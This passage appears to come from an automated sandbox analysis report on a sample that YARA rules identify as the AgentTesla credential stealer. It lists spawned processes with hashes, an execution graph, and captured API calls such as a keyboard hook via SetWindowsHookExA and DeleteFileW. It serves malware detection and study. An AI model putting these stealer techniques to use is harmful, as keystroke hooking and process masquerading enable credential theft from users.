                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2590372149.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2590372149.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2590372149.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        Target ID:8
                                                                                        Start time:16:16:52
                                                                                        Start date:11/03/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                                                                                        Imagebase:0x540000
                                                                                        File size:42'064 bytes
                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:16:16:53
                                                                                        Start date:11/03/2024
                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7672 -s 107896
                                                                                        Imagebase:0x7ff786c60000
                                                                                        File size:570'736 bytes
                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:12
                                                                                        Start time:16:17:04
                                                                                        Start date:11/03/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe"
                                                                                        Imagebase:0x6f0000
                                                                                        File size:42'064 bytes
                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:13
                                                                                        Start time:16:17:05
                                                                                        Start date:11/03/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff70f010000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:16
                                                                                        Start time:16:17:13
                                                                                        Start date:11/03/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exe"
                                                                                        Imagebase:0x2d0000
                                                                                        File size:42'064 bytes
                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:17
                                                                                        Start time:16:17:13
                                                                                        Start date:11/03/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff70f010000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:11.1%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:1.1%
                                                                                          Total number of Nodes:270
                                                                                          Total number of Limit Nodes:23
                                                                                          execution_graph 42826 6a33ae0 DuplicateHandle 42827 6a33b76 42826->42827 43140 6a33898 43141 6a338de GetCurrentProcess 43140->43141 43143 6a33930 GetCurrentThread 43141->43143 43144 6a33929 43141->43144 43145 6a33966 43143->43145 43146 6a3396d GetCurrentProcess 43143->43146 43144->43143 43145->43146 43147 6a339a3 43146->43147 43148 6a339cb GetCurrentThreadId 43147->43148 43149 6a339fc 43148->43149 42828 2e60848 42830 2e6084e 42828->42830 42829 2e6091b 42830->42829 42834 2e61380 42830->42834 42845 6a32780 42830->42845 42849 6a32790 42830->42849 42836 2e61396 42834->42836 42835 2e61490 42835->42830 42836->42835 42853 2e6fac2 42836->42853 42859 2e6fad0 42836->42859 42865 2e67da8 42836->42865 42870 2e67f71 42836->42870 42875 2e67f12 42836->42875 42880 2e67d84 42836->42880 42885 2e67ed4 42836->42885 42890 2e68258 42836->42890 42846 6a3279f 42845->42846 42935 6a31fcc 42846->42935 42850 6a3279f 42849->42850 42851 6a31fcc 12 API calls 42850->42851 42852 6a327c0 42851->42852 42852->42830 42854 2e6fad0 42853->42854 42855 2e6fb1d 42854->42855 42895 2e6fbb2 42854->42895 42899 2e6fb30 42854->42899 42903 2e6fb20 42854->42903 42855->42836 42860 2e6fad8 42859->42860 42861 2e6fb1d 42860->42861 42862 2e6fbb2 SetWindowsHookExA 42860->42862 42863 2e6fb20 SetWindowsHookExA 42860->42863 42864 2e6fb30 SetWindowsHookExA 42860->42864 42861->42836 42862->42860 42863->42860 42864->42860 42867 2e67dc1 42865->42867 42866 2e68003 42866->42836 42867->42866 42911 2e68020 42867->42911 42915 2e68011 42867->42915 42872 2e67f76 42870->42872 42871 2e68003 42871->42836 42873 2e68020 DeleteFileW 42872->42873 42874 2e68011 DeleteFileW 42872->42874 42873->42871 42874->42871 42877 2e67f17 42875->42877 42876 2e68003 42876->42836 42878 2e68020 DeleteFileW 42877->42878 42879 2e68011 DeleteFileW 42877->42879 42878->42876 42879->42876 42882 2e67d9d 42880->42882 42881 2e68003 42881->42836 42882->42881 42883 2e68020 DeleteFileW 42882->42883 42884 2e68011 DeleteFileW 42882->42884 42883->42881 42884->42881 42886 2e67ed9 42885->42886 42888 2e68020 DeleteFileW 42886->42888 42889 2e68011 DeleteFileW 42886->42889 42887 2e68003 42887->42836 42888->42887 42889->42887 42891 2e68262 42890->42891 42892 2e6827c 42891->42892 42923 6a5f9c0 42891->42923 42929 6a5f9af 42891->42929 42892->42836 42897 2e6fb6d 42895->42897 42896 2e6fbb0 42896->42854 42897->42896 42907 2e6f514 42897->42907 42900 2e6fb4d 42899->42900 42901 2e6f514 SetWindowsHookExA 42900->42901 42902 2e6fbb0 42900->42902 42901->42900 42902->42854 42905 2e6fb30 42903->42905 42904 2e6fbb0 42904->42854 42905->42904 42906 2e6f514 SetWindowsHookExA 42905->42906 42906->42905 42908 2e6fd38 SetWindowsHookExA 42907->42908 42910 2e6fdc2 42908->42910 42910->42897 42912 2e68030 42911->42912 42913 2e68062 42912->42913 42919 2e677e0 42912->42919 42913->42866 42916 2e68020 42915->42916 42917 2e68062 42916->42917 42918 2e677e0 DeleteFileW 42916->42918 42917->42866 42918->42917 42920 2e68080 DeleteFileW 42919->42920 42922 2e680ff 42920->42922 42922->42913 42924 6a5f9d5 42923->42924 42925 6a5fbea 42924->42925 42926 6a5fc10 GlobalMemoryStatusEx GlobalMemoryStatusEx 42924->42926 42927 6a5fe5c GlobalMemoryStatusEx GlobalMemoryStatusEx 42924->42927 42928 6a5fc01 GlobalMemoryStatusEx GlobalMemoryStatusEx 42924->42928 42925->42892 42926->42924 42927->42924 42928->42924 42931 6a5f9d5 42929->42931 42930 6a5fbea 42930->42892 42931->42930 42932 6a5fc01 GlobalMemoryStatusEx GlobalMemoryStatusEx 42931->42932 42933 6a5fc10 GlobalMemoryStatusEx GlobalMemoryStatusEx 42931->42933 42934 6a5fe5c GlobalMemoryStatusEx GlobalMemoryStatusEx 42931->42934 42932->42931 42933->42931 42934->42931 42936 6a31fd7 42935->42936 42939 6a3372c 42936->42939 42938 6a34146 42938->42938 42940 6a33737 42939->42940 42941 6a3486c 42940->42941 42943 6a36500 42940->42943 42941->42938 42944 6a36521 42943->42944 42945 6a36545 42944->42945 42947 6a366b0 42944->42947 42945->42941 42948 6a366bd 42947->42948 42949 6a366f6 42948->42949 42951 6a34638 42948->42951 42949->42945 42952 6a34643 42951->42952 42954 6a36768 42952->42954 42955 6a351b0 42952->42955 42954->42954 42956 6a351bb 42955->42956 42963 6a351c0 42956->42963 42958 6a367d7 42967 6a3bc70 42958->42967 42980 6a3bc69 42958->42980 42992 6a3bc60 42958->42992 42959 6a36811 42959->42954 42964 6a351cb 42963->42964 42965 6a37bd8 42964->42965 42966 6a36500 12 API calls 42964->42966 42965->42958 42966->42965 42969 6a3bca1 42967->42969 42970 6a3bda1 42967->42970 42968 6a3bcad 42968->42959 42969->42968 43004 6a3bee0 42969->43004 43010 6a3bee8 42969->43010 43015 6a3bed9 42969->43015 43021 6a3bee4 42969->43021 42970->42959 42971 6a3bced 43026 6a3d1e4 42971->43026 43037 6a3d1e0 42971->43037 43048 6a3d1e8 42971->43048 43059 6a3d1d8 42971->43059 42981 6a3bc6e 42980->42981 42982 6a3bcad 42981->42982 42984 6a3bee0 4 API calls 42981->42984 42985 6a3bee4 4 API calls 42981->42985 42986 6a3bed9 4 API calls 42981->42986 42987 6a3bee8 4 API calls 42981->42987 42982->42959 42983 6a3bced 42988 6a3d1e0 8 API calls 42983->42988 42989 6a3d1e4 8 API calls 42983->42989 42990 6a3d1e8 8 API calls 42983->42990 42991 6a3d1d8 8 API calls 42983->42991 42984->42983 42985->42983 42986->42983 42987->42983 42988->42982 42989->42982 42990->42982 42991->42982 42993 6a3bc6e 42992->42993 42994 6a3bcad 42993->42994 42996 6a3bee0 4 API calls 42993->42996 42997 6a3bee4 4 API calls 42993->42997 42998 6a3bed9 4 API calls 42993->42998 42999 6a3bee8 4 API calls 42993->42999 42994->42959 42995 6a3bced 43000 6a3d1e0 8 API calls 42995->43000 43001 6a3d1e4 8 API calls 42995->43001 43002 6a3d1e8 8 API calls 42995->43002 43003 6a3d1d8 8 API calls 42995->43003 42996->42995 42997->42995 42998->42995 42999->42995 43000->42994 43001->42994 43002->42994 43003->42994 43005 6a3beea 43004->43005 43070 6a3bf34 43005->43070 43080 6a3bf31 43005->43080 43090 6a3bf28 43005->43090 43006 6a3bef2 43006->42971 43011 6a3bef2 43010->43011 43012 6a3bf31 2 API calls 43010->43012 43013 6a3bf34 2 API calls 43010->43013 43014 6a3bf28 2 API calls 43010->43014 43011->42971 43012->43011 43013->43011 43014->43011 43016 6a3bee2 43015->43016 43018 6a3bf31 2 API calls 43016->43018 43019 6a3bf34 2 API calls 43016->43019 43020 6a3bf28 2 API calls 43016->43020 43017 6a3bef2 43017->42971 43018->43017 43019->43017 43020->43017 43022 6a3bef2 43021->43022 43023 6a3bf31 2 API calls 43021->43023 43024 6a3bf34 2 API calls 43021->43024 43025 6a3bf28 2 API calls 43021->43025 43022->42971 43023->43022 43024->43022 43025->43022 43028 6a3d1e8 43026->43028 43027 6a3d2c2 43027->43027 43028->43027 43100 6a3dfb1 43028->43100 43105 6a3e0bd 43028->43105 43110 6a3e078 43028->43110 43115 6a3e038 43028->43115 43120 6a3dfd8 43028->43120 43125 6a3dff8 43028->43125 43130 6a3dfb8 43028->43130 43135 6a3e059 43028->43135 43038 6a3d1ea 43037->43038 43039 6a3d2c2 43038->43039 43040 6a3dfb1 CreateWindowExW 43038->43040 43041 6a3e059 CreateWindowExW 43038->43041 43042 6a3dfb8 CreateWindowExW 43038->43042 43043 6a3dff8 CreateWindowExW 43038->43043 43044 6a3dfd8 CreateWindowExW 43038->43044 43045 6a3e038 CreateWindowExW 43038->43045 43046 6a3e078 CreateWindowExW 43038->43046 43047 6a3e0bd CreateWindowExW 43038->43047 43040->43039 43041->43039 43042->43039 43043->43039 43044->43039 43045->43039 43046->43039 43047->43039 43049 6a3d1ed 43048->43049 43050 6a3d2c2 43049->43050 43051 6a3dfb1 CreateWindowExW 43049->43051 43052 6a3e059 CreateWindowExW 43049->43052 43053 6a3dfb8 CreateWindowExW 43049->43053 43054 6a3dff8 CreateWindowExW 43049->43054 43055 6a3dfd8 CreateWindowExW 43049->43055 43056 6a3e038 CreateWindowExW 43049->43056 43057 6a3e078 CreateWindowExW 43049->43057 43058 6a3e0bd CreateWindowExW 43049->43058 43051->43050 43052->43050 43053->43050 43054->43050 43055->43050 43056->43050 43057->43050 43058->43050 43060 6a3d1e6 43059->43060 43061 6a3d2c2 43060->43061 43062 6a3dfb1 CreateWindowExW 43060->43062 43063 6a3e059 CreateWindowExW 43060->43063 43064 6a3dfb8 CreateWindowExW 43060->43064 43065 6a3dff8 CreateWindowExW 43060->43065 43066 6a3dfd8 CreateWindowExW 43060->43066 43067 6a3e038 CreateWindowExW 43060->43067 43068 6a3e078 CreateWindowExW 43060->43068 43069 6a3e0bd CreateWindowExW 43060->43069 43062->43061 43063->43061 43064->43061 43065->43061 43066->43061 43067->43061 43068->43061 43069->43061 43071 6a3bf49 43070->43071 43073 6a3bf6c 43070->43073 43071->43073 43076 6a3c1c1 LoadLibraryExW 43071->43076 43077 6a3c1d0 LoadLibraryExW 43071->43077 43078 6a3c1c8 LoadLibraryExW 43071->43078 43079 6a3c1cc LoadLibraryExW 43071->43079 43072 6a3bf64 43072->43073 43074 6a3c170 GetModuleHandleW 43072->43074 43073->43006 43075 6a3c19d 43074->43075 43075->43006 43076->43072 43077->43072 43078->43072 43079->43072 43081 6a3bf3a 43080->43081 43082 6a3bf6c 43081->43082 43086 6a3c1c1 LoadLibraryExW 43081->43086 43087 6a3c1d0 LoadLibraryExW 43081->43087 43088 6a3c1c8 LoadLibraryExW 43081->43088 43089 6a3c1cc LoadLibraryExW 43081->43089 43082->43006 43083 6a3c170 GetModuleHandleW 43085 6a3c19d 43083->43085 43084 6a3bf64 43084->43082 43084->43083 43085->43006 43086->43084 43087->43084 43088->43084 43089->43084 43091 6a3bf32 43090->43091 43093 6a3bf6c 43091->43093 43096 6a3c1c1 LoadLibraryExW 43091->43096 43097 6a3c1d0 LoadLibraryExW 43091->43097 43098 6a3c1c8 LoadLibraryExW 43091->43098 43099 6a3c1cc LoadLibraryExW 43091->43099 43092 6a3bf64 43092->43093 43094 6a3c170 GetModuleHandleW 43092->43094 43093->43006 43095 6a3c19d 43094->43095 43095->43006 43096->43092 43097->43092 43098->43092 43099->43092 43102 6a3dfba 43100->43102 43101 6a3e0ba 43101->43027 43102->43101 43103 6a3e1d3 CreateWindowExW 43102->43103 43104 6a3e234 43103->43104 43106 6a3e0c6 43105->43106 43107 6a3e0fe CreateWindowExW 43105->43107 43106->43027 43109 6a3e234 43107->43109 43109->43109 43111 6a3e07a 43110->43111 43112 6a3e0ba 43111->43112 43113 6a3e1d3 CreateWindowExW 43111->43113 43112->43027 43114 6a3e234 43113->43114 43114->43114 43117 6a3e03a 43115->43117 43116 6a3e0ba 43116->43027 43117->43116 43118 6a3e1d3 CreateWindowExW 43117->43118 43119 6a3e234 43118->43119 43119->43119 43122 6a3dfdd 43120->43122 43121 6a3e0ba 43121->43027 43122->43121 43123 6a3e1d3 CreateWindowExW 43122->43123 43124 6a3e234 43123->43124 43124->43124 43127 6a3dffa 43125->43127 43126 6a3e0ba 43126->43027 43127->43126 43128 6a3e1d3 CreateWindowExW 43127->43128 43129 6a3e234 43128->43129 43129->43129 43132 6a3dfba 43130->43132 43131 6a3e0ba 43131->43027 43132->43131 43133 6a3e1d3 CreateWindowExW 43132->43133 43134 6a3e234 43133->43134 43134->43134 43136 6a3e05a 43135->43136 43137 6a3e0ba 43136->43137 43138 6a3e1d3 CreateWindowExW 43136->43138 43137->43027 43139 6a3e234 43138->43139 43139->43139
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2590161375.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_2e60000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 38ec76f61ca3e7d55c01baa9711a871c3e4248dc86931934267cade15f2eaa36
                                                                                          • Instruction ID: dc979334fae8a351981411cb22045745915073795cc290598840fb99c1fea792
                                                                                          • Opcode Fuzzy Hash: 38ec76f61ca3e7d55c01baa9711a871c3e4248dc86931934267cade15f2eaa36
                                                                                          • Instruction Fuzzy Hash: 14631B31D50B1A8ACB11EF68C8846A9F7B1FF99300F55D79AE45877121EB70AAC4CF81
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2595143786.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a50000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $
                                                                                          • API String ID: 0-3993045852
                                                                                          • Opcode ID: 99bd3205f73bb1ed1244e9b0aee2a19d2bcf1bd5f807f0e464adac7e3bb16dcb
                                                                                          • Instruction ID: f7033643eb6870ba7e6d918c99862d4c0cf68cd6c2b836de425c930a97a924e5
                                                                                          • Opcode Fuzzy Hash: 99bd3205f73bb1ed1244e9b0aee2a19d2bcf1bd5f807f0e464adac7e3bb16dcb
                                                                                          • Instruction Fuzzy Hash: 9922B175E102199FDF64EBA8C4846AEBBB2FF85310F25846AD815AF340DB35EC41CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 942 2e6f514-2e6fd82 946 2e6fd84-2e6fd8c 942->946 947 2e6fd8e-2e6fdc0 SetWindowsHookExA 942->947 946->947 948 2e6fdc2-2e6fdc8 947->948 949 2e6fdc9-2e6fde9 947->949 948->949
                                                                                          APIs
                                                                                          • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,02E6FBA0,00000000,00000000), ref: 02E6FDB3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2590161375.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_2e60000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
                                                                                          • Opcode ID: f81b1d66c5a684d135e2a7d5794f176a1e28d99674a74aac7d8d7cb0e326ddb3
                                                                                          • Instruction ID: f1f9a24ba250adbfbf42318911a8e0f6bdab40e8aae449ecc4d1c9921db82f65
                                                                                          • Opcode Fuzzy Hash: f81b1d66c5a684d135e2a7d5794f176a1e28d99674a74aac7d8d7cb0e326ddb3
                                                                                          • Instruction Fuzzy Hash: B7214975D002099FDB14CF9AD844BEEFBF4EF89314F10842AE419A7250C774A944CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2590161375.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_2e60000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: \VNm
                                                                                          • API String ID: 0-2505523818
                                                                                          • Opcode ID: 290574e02f8339d1c208a3d3e0a73f905542fc5b2f59d4bcab5cd4f307719c5c
                                                                                          • Instruction ID: 35fc68c6846233875c09b3c63328c4a2affda451738e0fac8456d2c10481ccca
                                                                                          • Opcode Fuzzy Hash: 290574e02f8339d1c208a3d3e0a73f905542fc5b2f59d4bcab5cd4f307719c5c
                                                                                          • Instruction Fuzzy Hash: FD918170E80209DFDF20CFA9C9897EEBBF2AF48748F14D129E414A7294DB759845CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2595143786.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a50000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3b08a1f4ec5895b250974c351e2e4d0fa74a6e71f8856233a32a685491a9ad2
                                                                                          • Instruction ID: 5c633dfa55458582cb5b47211a9afb5a32ffd3ecde9e0db682be6d1032b66db0
                                                                                          • Opcode Fuzzy Hash: a3b08a1f4ec5895b250974c351e2e4d0fa74a6e71f8856233a32a685491a9ad2
                                                                                          • Instruction Fuzzy Hash: 38629B74B002049FDB64EB68D594AADB7F2FF88311F558469E806EB3A1DB35EC41CB90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2595143786.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a50000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2e2b794f6d68ce937436c61b371cc93be472e1e108fc1b1ad5aaf4ee35e4f433
                                                                                          • Instruction ID: 6a19e6cb0090b5ef4781fe7646fe221cc5795b243226e6e2314784563870e6ed
                                                                                          • Opcode Fuzzy Hash: 2e2b794f6d68ce937436c61b371cc93be472e1e108fc1b1ad5aaf4ee35e4f433
                                                                                          • Instruction Fuzzy Hash: 44524E70E102098BEF64EB68D4A07ADB7B2FB89311F258429D805EF395DB35DC41CBA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2595143786.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a50000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4a7ea20b28e79f2d0c7176f1ea92ff8d874dba86394ff0ee060a29dd98c7d4ec
                                                                                          • Instruction ID: d66563b8686afee2309cbf265522b865e4ba0d2df8e156ec36e4d26a7889edd9
                                                                                          • Opcode Fuzzy Hash: 4a7ea20b28e79f2d0c7176f1ea92ff8d874dba86394ff0ee060a29dd98c7d4ec
                                                                                          • Instruction Fuzzy Hash: 3E327074B002099FDB54EF68D894BADB7B2FB88320F158529E806EB355DB35EC41CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2595143786.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a50000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 22eeb7410662de7a7f2c5be0b6d7f9e603734cd4dda09bc16d4fd002152f29a0
                                                                                          • Instruction ID: 400d98e8c34783f2c6faa37920e7b055207d0b96b540ae83b75abfe28a7ae281
                                                                                          • Opcode Fuzzy Hash: 22eeb7410662de7a7f2c5be0b6d7f9e603734cd4dda09bc16d4fd002152f29a0
                                                                                          • Instruction Fuzzy Hash: 7A321E30E10719CBDB15EF69D89459DB7B2FFC9300F61C6A9E409AB251EB30AD85CB90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2595143786.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_6a50000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4dec2b768d9c834f6f2c206be1dd5cda28ce3b8d42481beae24574fe8ec3000b
                                                                                          • Instruction ID: 4864bc882f027b9573f3b203c4dd9cdc879f76d579dea5063cd8251983a5d0e8
                                                                                          • Opcode Fuzzy Hash: 4dec2b768d9c834f6f2c206be1dd5cda28ce3b8d42481beae24574fe8ec3000b
                                                                                          • Instruction Fuzzy Hash: 5602B130B002158FDB54EB69D490AAEB7F2FF88310F158569E815EB391DB39EC42CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2590161375.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_2e60000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f827b2cd23d1423a5bd10d15fb2295cc0ecbec9ed36e66a12f63fe8fdcad46ed
                                                                                          • Instruction ID: a252b32e7efb51de44666e80367dd9f4d18e1b22904477d762d2218259b5f9b6
                                                                                          • Opcode Fuzzy Hash: f827b2cd23d1423a5bd10d15fb2295cc0ecbec9ed36e66a12f63fe8fdcad46ed
                                                                                          • Instruction Fuzzy Hash: 0CD1EE74B802159FEB14DB78C884B7EBBB6FB88350F288569D409DB295DB31DC42CB90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2590161375.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_2e60000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de77fd8ad930cd364df299b21b76a2a46f149f33501273159ca2f520794c2c3c
                                                                                          • Instruction ID: 3b9f85509643e6008ca2180513573a5694e7dc7b836dce9d784a3a6eeb52e519
                                                                                          • Opcode Fuzzy Hash: de77fd8ad930cd364df299b21b76a2a46f149f33501273159ca2f520794c2c3c
                                                                                          • Instruction Fuzzy Hash: EDD18B71A802058FDB10CFA8D9847AEBBB2FB88314F24C57AE409EB395D775D844CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2590161375.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_2e60000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: faed24f4139915ff5e2bba29d9984b46413e293a3d2f083527413003182e5f90
                                                                                          • Instruction ID: dcbdf213a522147e467e4810b6f143c1d2cda20e76c4941a4ecee6d026e84d5b
                                                                                          • Opcode Fuzzy Hash: faed24f4139915ff5e2bba29d9984b46413e293a3d2f083527413003182e5f90
                                                                                          • Instruction Fuzzy Hash: E9B1F734B402199BDB19AB758864ABF7BB7BFC8640B19C46DE047EB3C5DE348C019B91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2590161375.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_2e60000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4f7000e24597a7a35a37f79c2cf276723ea15151f3e2901c7fbea27c2303578a
                                                                                          • Instruction ID: 6685afbb86789f6c746f9e00b1ecdb53749f8aff8a9384ba3c5c7ba04a1ce65d
                                                                                          • Opcode Fuzzy Hash: 4f7000e24597a7a35a37f79c2cf276723ea15151f3e2901c7fbea27c2303578a
                                                                                          • Instruction Fuzzy Hash: A0B16F70E80209CFDB20CFA9C8997EDBBF2AF88358F14D529D415E7294EB749845CB81
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 06A33916
                                                                                          • GetCurrentThread.KERNEL32 ref: 06A33953
                                                                                          • GetCurrentProcess.KERNEL32 ref: 06A33990
